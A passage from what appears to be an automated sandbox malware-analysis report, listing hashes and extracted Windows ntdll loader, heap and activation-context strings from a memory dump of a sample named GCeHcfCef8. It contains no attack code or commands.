                                                                                                  • Instruction Fuzzy Hash: 7B0270B1D002299FDB61DF58CC84BA9F7B8AB54704F1041DAEB09A7246EB709F84CF59
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                  • API String ID: 0-2515994595
                                                                                                  • Opcode ID: 0273d1c1b45ce08d1bd17f9965b4a5b0ff65b47f0ce480545f241cb7e9137ce1
                                                                                                  • Instruction ID: bb1175ec0940717df8a57916550171a6d1666e6b16c5a8181fd720a593bcb373
                                                                                                  • Opcode Fuzzy Hash: 0273d1c1b45ce08d1bd17f9965b4a5b0ff65b47f0ce480545f241cb7e9137ce1
                                                                                                  • Instruction Fuzzy Hash: 6C51CF715453119BC329EF288884BABFBECFF98350F54492DE959C3284E770D584C7A2
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                                  • API String ID: 0-3197712848
                                                                                                  • Opcode ID: 15a659b3d6789938532a970790be3d70c63c353ed467708c86c740583a6e2649
                                                                                                  • Instruction ID: 7c6369ee756484ed5ae173b423d762ff107b00fc7e217bc316a70ff9efb3f2c1
                                                                                                  • Opcode Fuzzy Hash: 15a659b3d6789938532a970790be3d70c63c353ed467708c86c740583a6e2649
                                                                                                  • Instruction Fuzzy Hash: 0512EF71A093468BD325DF68C880BAAB7E5FF84714F08491DFA898B391E734D945CB92
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                  • API String ID: 0-1700792311
                                                                                                  • Opcode ID: 4ead3c7a93d00c8160fc9d3fc0d384b8daee510211a47030964322952e15a555
                                                                                                  • Instruction ID: b500591ad5bbcdb97e288b5aa5755fbe9097531143a4d719d06fa2e633720f6b
                                                                                                  • Opcode Fuzzy Hash: 4ead3c7a93d00c8160fc9d3fc0d384b8daee510211a47030964322952e15a555
                                                                                                  • Instruction Fuzzy Hash: 2CD1EE31920286DFDF22DF68E841AA9FBF5FF4A720F19804DF5469B612C7349988CB54
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01768A3D
                                                                                                  • VerifierFlags, xrefs: 01768C50
                                                                                                  • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01768A67
                                                                                                  • HandleTraces, xrefs: 01768C8F
                                                                                                  • AVRF: -*- final list of providers -*- , xrefs: 01768B8F
                                                                                                  • VerifierDlls, xrefs: 01768CBD
                                                                                                  • VerifierDebug, xrefs: 01768CA5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                  • API String ID: 0-3223716464
                                                                                                  • Opcode ID: 994dd8199f443961c0a0ccbccbad73687a596de7d6f5fa4ae70ef134a423a57a
                                                                                                  • Instruction ID: 98d5994b88bf25eade47f02f254f768400161977dad30c91df758ce1bd1c6f34
                                                                                                  • Opcode Fuzzy Hash: 994dd8199f443961c0a0ccbccbad73687a596de7d6f5fa4ae70ef134a423a57a
                                                                                                  • Instruction Fuzzy Hash: 8F9125B2646316AFD721DF68C890B1AFBBCEBA4724F04445CFE456B244C730AD44CBA6
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                  • API String ID: 0-1109411897
                                                                                                  • Opcode ID: 5544607f6983764b47863f48fab81993d7d1a79f27e10cce88bea6b56d686869
                                                                                                  • Instruction ID: 7b15f4a0fec87429dc5b7ff1fa6f10e3f4f89d5aa3ac55ec2cf4557b95df6213
                                                                                                  • Opcode Fuzzy Hash: 5544607f6983764b47863f48fab81993d7d1a79f27e10cce88bea6b56d686869
                                                                                                  • Instruction Fuzzy Hash: F1A23674A0662A8FDF64DF18CC987A9BBB5AF45304F1442E9D90EA7390DB319E85DF00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                  • API String ID: 0-792281065
                                                                                                  • Opcode ID: c7ae23e2efa630a249b3c509f3a1345e6b5948b100069e4b5394212a5d183a87
                                                                                                  • Instruction ID: 1f16c2d3a76cce0c7e6378f4a570b877d1102af2415ec40007a97ed470acdc11
                                                                                                  • Opcode Fuzzy Hash: c7ae23e2efa630a249b3c509f3a1345e6b5948b100069e4b5394212a5d183a87
                                                                                                  • Instruction Fuzzy Hash: DE913971A413299BDB35DF58D888BA9FBB1AB50B34F10412CFD0667289E7F09981C791
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01739A2A
                                                                                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 017399ED
                                                                                                  • LdrpInitShimEngine, xrefs: 017399F4, 01739A07, 01739A30
                                                                                                  • apphelp.dll, xrefs: 016D6496
                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 01739A11, 01739A3A
                                                                                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01739A01
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                  • API String ID: 0-204845295
                                                                                                  • Opcode ID: 7b14ed8656d3b65625038c238dd3748e08d79480360c65d67c1a068676d261a3
                                                                                                  • Instruction ID: 3ba55bb351f67dc85b269652f15ad2bba89a8e929aeac818b7a2d158d94d22cb
                                                                                                  • Opcode Fuzzy Hash: 7b14ed8656d3b65625038c238dd3748e08d79480360c65d67c1a068676d261a3
                                                                                                  • Instruction Fuzzy Hash: 955105716083059FD720DF24CC91BABB7E5FB84B58F00491DFA8697151DB70EA45CB92
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  • RtlGetAssemblyStorageRoot, xrefs: 01752160, 0175219A, 017521BA
                                                                                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0175219F
                                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01752178
                                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01752180
                                                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 017521BF
                                                                                                  • SXS: %s() passed the empty activation context, xrefs: 01752165
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                  • API String ID: 0-861424205
                                                                                                  • Opcode ID: 770e013b68c88fa6710e15a0a776986f76dd9ae68e24b5613e9179453fb201c4
                                                                                                  • Instruction ID: eec28f89d014e043eea4504f94911046f0a8d6f35effc38d5b582a987a1e9287
                                                                                                  • Opcode Fuzzy Hash: 770e013b68c88fa6710e15a0a776986f76dd9ae68e24b5613e9179453fb201c4
                                                                                                  • Instruction Fuzzy Hash: 2A310536B40215BBE7219A9E9C45F6BFB68DB64E50F15006DFF05BB146D2B09E00CBA1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 017581E5
                                                                                                  • LdrpInitializeProcess, xrefs: 0171C6C4
                                                                                                  • LdrpInitializeImportRedirection, xrefs: 01758177, 017581EB
                                                                                                  • Loading import redirection DLL: '%wZ', xrefs: 01758170
                                                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 01758181, 017581F5
                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 0171C6C3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                  • API String ID: 0-475462383
                                                                                                  • Opcode ID: 91f7322bbcd81df204d7312f91a9e346976a5e797d89cd7778e92a57dc27d4dd
                                                                                                  • Instruction ID: 5ded1117ca83d7c7d39e341bd0355025501df15bec573e7b45e9bc19570d0742
                                                                                                  • Opcode Fuzzy Hash: 91f7322bbcd81df204d7312f91a9e346976a5e797d89cd7778e92a57dc27d4dd
                                                                                                  • Instruction Fuzzy Hash: 8C3106B16443069BC324EB29DC49E2AF7E4EF94B20F04455CF9855B399E670ED04C7A2
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                    • Part of subcall function 01722DF0: LdrInitializeThunk.NTDLL ref: 01722DFA
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01720BA3
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01720BB6
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01720D60
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01720D74
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 1404860816-0
                                                                                                  • Opcode ID: 31bb38ec87174f6567a5394b8dc49b01ea3e57a319ac2dd1ef589ae6d3c0aa98
                                                                                                  • Instruction ID: 56f805d00bc7e426d24244a583dceae62e55092098d92db2b8472a8012462d82
                                                                                                  • Opcode Fuzzy Hash: 31bb38ec87174f6567a5394b8dc49b01ea3e57a319ac2dd1ef589ae6d3c0aa98
                                                                                                  • Instruction Fuzzy Hash: 00427C71900715DFDB61CF28C884BAAB7F5FF48314F0445AAE989DB245E770AA85CF60
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                  • API String ID: 0-379654539
                                                                                                  • Opcode ID: e12d604c3e92369e0e3662bb572feda7979e06dcdc76c95f4cf6834beb2d02ea
                                                                                                  • Instruction ID: 6fef69ba39a27c064d9437d416f1384d8e423eeda5fdf3f4464fe02b7557ec0d
                                                                                                  • Opcode Fuzzy Hash: e12d604c3e92369e0e3662bb572feda7979e06dcdc76c95f4cf6834beb2d02ea
                                                                                                  • Instruction Fuzzy Hash: 3AC18C7510A382CFD711CF98C848B6AB7E4BF84704F048A6EF9958B391E734C94ACB56
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  • LdrpInitializeProcess, xrefs: 01718422
                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 01718421
                                                                                                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0171855E
                                                                                                  • @, xrefs: 01718591
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                  • API String ID: 0-1918872054
                                                                                                  • Opcode ID: 3b371ec557b802b0e254214435d7bb8703f8e2d5c2e3f22363f91cb6e945fee1
                                                                                                  • Instruction ID: 924f545a797b93d8091a9b50e1726454976352d683189f9c31b458bca6a06d03
                                                                                                  • Opcode Fuzzy Hash: 3b371ec557b802b0e254214435d7bb8703f8e2d5c2e3f22363f91cb6e945fee1
                                                                                                  • Instruction Fuzzy Hash: 73918771548345AFE721DF29CC80FABFBE8EB84684F40092EFA8496155E774D9448B62
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  • .Local, xrefs: 017128D8
                                                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 017522B6
                                                                                                  • SXS: %s() passed the empty activation context, xrefs: 017521DE
                                                                                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 017521D9, 017522B1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                  • API String ID: 0-1239276146
                                                                                                  • Opcode ID: 6c299e0c0d574603025c16a080b30a7fb84c8334ef555fcd44e0bdd95127314c
                                                                                                  • Instruction ID: 35af940c9680434c5b5d88c53df992791e90011951c42eac44dce57185323eb6
                                                                                                  • Opcode Fuzzy Hash: 6c299e0c0d574603025c16a080b30a7fb84c8334ef555fcd44e0bdd95127314c
                                                                                                  • Instruction Fuzzy Hash: 27A19A3590422ADBDB24CF6CCC88BA9F7B1BF58354F2541E9D908AB256D7709E80CF90
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0175342A
                                                                                                  • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01753456
                                                                                                  • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01753437
                                                                                                  • RtlDeactivateActivationContext, xrefs: 01753425, 01753432, 01753451
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                  • API String ID: 0-1245972979
                                                                                                  • Opcode ID: 65948c64eb2585613ff84f3bcf075cd5e17d8ebab12abde7119532ab2d167582
                                                                                                  • Instruction ID: cdf996a91df96efae83da119c8702653199a88b5bed4918e70d75375deca8220
                                                                                                  • Opcode Fuzzy Hash: 65948c64eb2585613ff84f3bcf075cd5e17d8ebab12abde7119532ab2d167582
                                                                                                  • Instruction Fuzzy Hash: 6C6100326007129BD7228F1DC841B3AFBE5FF80B90F15856DE9569B255CBB0E801CB95
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01740FE5
                                                                                                  • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0174106B
                                                                                                  • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01741028
                                                                                                  • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 017410AE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                  • API String ID: 0-1468400865
                                                                                                  • Opcode ID: 28b79a515176afece8d66d033622df683d2e2b9f9ace3486d371ef63063fa94f
                                                                                                  • Instruction ID: c8e08f11e8a2d6bf890d8f36c734933e900bdf9daf0a12193508f94b2a5cc763
                                                                                                  • Opcode Fuzzy Hash: 28b79a515176afece8d66d033622df683d2e2b9f9ace3486d371ef63063fa94f
                                                                                                  • Instruction Fuzzy Hash: BA71B171A053159FCB21DF14CC88B9BBBE8AF64754F400568F9498B24AD734D589CBD2
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  • minkernel\ntdll\ldrsnap.c, xrefs: 01753640, 0175366C
                                                                                                  • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0175362F
                                                                                                  • LdrpFindDllActivationContext, xrefs: 01753636, 01753662
                                                                                                  • Querying the active activation context failed with status 0x%08lx, xrefs: 0175365C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                  • API String ID: 0-3779518884
                                                                                                  • Opcode ID: ad34553e90c7c2c19cd619e8273081f4ba8ff10307c612ae0e0d1695e638a640
                                                                                                  • Instruction ID: 5726ba27dfbf87bd51912287cfe75abc24443ed644eaef2b6e92ae22afbb21cd
                                                                                                  • Opcode Fuzzy Hash: ad34553e90c7c2c19cd619e8273081f4ba8ff10307c612ae0e0d1695e638a640
                                                                                                  • Instruction Fuzzy Hash: 91316E32900211AADF32AB1CDC89B35F6B4FB01764F86806EEB8B57259D7A09CC083D1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  • apphelp.dll, xrefs: 01702462
                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 0174A9A2
                                                                                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0174A992
                                                                                                  • LdrpDynamicShimModule, xrefs: 0174A998
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                  • API String ID: 0-176724104
                                                                                                  • Opcode ID: 0618f89f35c91a25dce9a1d6c7f0e666acfede1e81946fa88d0fbf9e616c6aad
                                                                                                  • Instruction ID: 60c149fae93779d1b66e80ad220575e37b51918eea3dd30c8bec5121bdeccc22
                                                                                                  • Opcode Fuzzy Hash: 0618f89f35c91a25dce9a1d6c7f0e666acfede1e81946fa88d0fbf9e616c6aad
                                                                                                  • Instruction Fuzzy Hash: 9C3148B6681306EBDB319F5DCC85A7AFBB5FB84B20F16405DF90267245C7705981CB90
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 016F327D
                                                                                                  • HEAP[%wZ]: , xrefs: 016F3255
                                                                                                  • HEAP: , xrefs: 016F3264
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                  • API String ID: 0-617086771
                                                                                                  • Opcode ID: f1f5dd11d791157a3ae63acd1b0809f835dc931fc140df2f35a82072f21cfeac
                                                                                                  • Instruction ID: c4c7ef644c3b86a79ae2574f1b76d07bd545d663944d46c27dd81ff407a53b37
                                                                                                  • Opcode Fuzzy Hash: f1f5dd11d791157a3ae63acd1b0809f835dc931fc140df2f35a82072f21cfeac
                                                                                                  • Instruction Fuzzy Hash: 9492CC71A042499FDB25CF68C8547AEBBF1FF48304F18809DEA4AAB391D735A946CF50
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                  • API String ID: 0-4253913091
                                                                                                  • Opcode ID: 5f4af3c2741fdf256b22de13a2ba21f0864c3a37029cdd794a311cde2279514e
                                                                                                  • Instruction ID: e58cc8858832d02eb555927b6910f2e190fa656d658602653ae7d8621de497b2
                                                                                                  • Opcode Fuzzy Hash: 5f4af3c2741fdf256b22de13a2ba21f0864c3a37029cdd794a311cde2279514e
                                                                                                  • Instruction Fuzzy Hash: 18F19C74A00606DFEB25CF68C884B6AB7B6FF45304F1481ADF6169B396D734E981CB90
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID: $@
                                                                                                  • API String ID: 2994545307-1077428164
                                                                                                  • Opcode ID: 8a3d82abf156164358244fec2de926d696db18b4d67c4182674b10b7900f5595
                                                                                                  • Instruction ID: 6ee93d2879db8aa9843f30113d39d607a47e2cb4c0397baf33ea218acf9d3509
                                                                                                  • Opcode Fuzzy Hash: 8a3d82abf156164358244fec2de926d696db18b4d67c4182674b10b7900f5595
                                                                                                  • Instruction Fuzzy Hash: BEC25C71609341DFE72ACF28C841BABFBE5AB88754F04896DF9C987281D734E845CB52
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: FilterFullPath$UseFilter$\??\
                                                                                                  • API String ID: 0-2779062949
                                                                                                  • Opcode ID: 438ef3ce45246b3af53ea57df98a7a568ed36618c1c454d17b8499962bc895ee
                                                                                                  • Instruction ID: ff2148bcae164d1edda547ae5c2e81587159cb2d93168ebf970a4d0ca9f9ae56
